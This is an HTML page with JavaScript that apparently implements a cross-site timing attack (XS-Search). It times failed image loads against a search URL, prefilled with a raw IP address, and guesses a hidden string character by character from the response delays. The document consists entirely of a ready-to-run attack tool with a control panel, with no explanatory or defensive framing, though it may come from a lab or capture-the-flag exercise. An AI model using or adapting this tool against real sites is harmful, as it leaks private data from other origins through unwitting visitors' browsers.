<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body><doctype html="">
  <script type="text/javascript">
  function loadImg(src, callback) {
    var x = new Image();
    var s = performance.now();  
    x.onerror = function() {
      var e = performance.now();
      var d = e - s;
      callback(d);
    }
    x.src = src;
  }
  function basecalc(pfix, i, n, a, b, resa, resb) {
    if(i < n) {
      document.getElementById('console').value += ".";
      loadImg(pfix + a, function(d) {
        resa.push(d);
        basecalc(pfix, i+1, n, b, a, resb, resa);
      });
    }
    else {
      ta = resa.reduce((x, y) => x + y, 0)*2/n;
      tb = resb.reduce((x, y) => x + y, 0)*2/n;
      document.getElementById('console').value += "done\n";
      document.getElementById('base').value = Math.min(ta,tb);
    }
  }
  function baseline() {
    var pfix = document.getElementById('pfix').value;
    var cset = document.getElementById('cset').value;
    var rept = document.getElementById('rept').value;
    var resa = [];
    var resb = [];
    document.getElementById('console').value += "baseline:";
    basecalc(pfix,0,rept*2,cset.substr(0, 1),cset.substr(1, 1),resa,resb);
  }
  function searchcalc(charset, prefix, cpos, ppos, tlast) {
    var c = charset.substr(cpos, 1);
    var b = document.getElementById('base').value;
    if(cpos > charset.length) {
      document.getElementById('console').value += "search done:\n";
      document.getElementById('console').value += prefix;
      document.getElementById('console').scrollTop = document.getElementById('console').scrollHeight;
      return;
    }
    loadImg(prefix+c, function(d) {
      document.getElementById('console').value += "url:\""+prefix+c+"\"; time:"+d+"\n";
      document.getElementById('console').scrollTop = document.getElementById('console').scrollHeight;
      if(d - tlast > b*1.5){
        // hit, move to next pos
        prefix += c;
        cpos = 0;
        ppos++;
        searchcalc(charset, prefix,cpos,ppos,d);
      }
      else {
        // miss, move to next char
        cpos++;
        searchcalc(charset, prefix,cpos,ppos,tlast);
      }
    });
  }
  function search() {
    var pfix = document.getElementById('pfix').value;
    var cset = document.getElementById('cset').value;
    searchcalc(cset,pfix,0,0,0);
  }
  

  </script>
  
  <table>
  <tr>
    <td>prefix:</td>
    <td>
      <textarea id="pfix" rows="1" cols="50">http://35.246.195.150/test.php?q=</textarea>
    </td>
  </tr>
  <tr>
    <td>charset:</td>
    <td>
      <textarea id="cset" rows="1" cols="50">abcdefghijklmnopqrstuvwxyz</textarea><br>
    </td>
  </tr>
  <tr>
    <td>repeat:</td>
    <td>
      <textarea id="rept" rows="1" cols="50">10</textarea><br>
    </td>
  </tr>
  <tr>
    <td>baseline:</td>
    <td>
      <textarea id="base" rows="1" cols="50"></textarea><br>
    </td>
  </tr>
  <tr>
  <td></td>
  <td>
  <button onclick="baseline()">Calc baseline</button>
  <button onclick="search()">Run search</button>
  </td>
  </tr>
  </table>
  <textarea id="console" rows="40" cols="60"></textarea><br>

</doctype></body></html>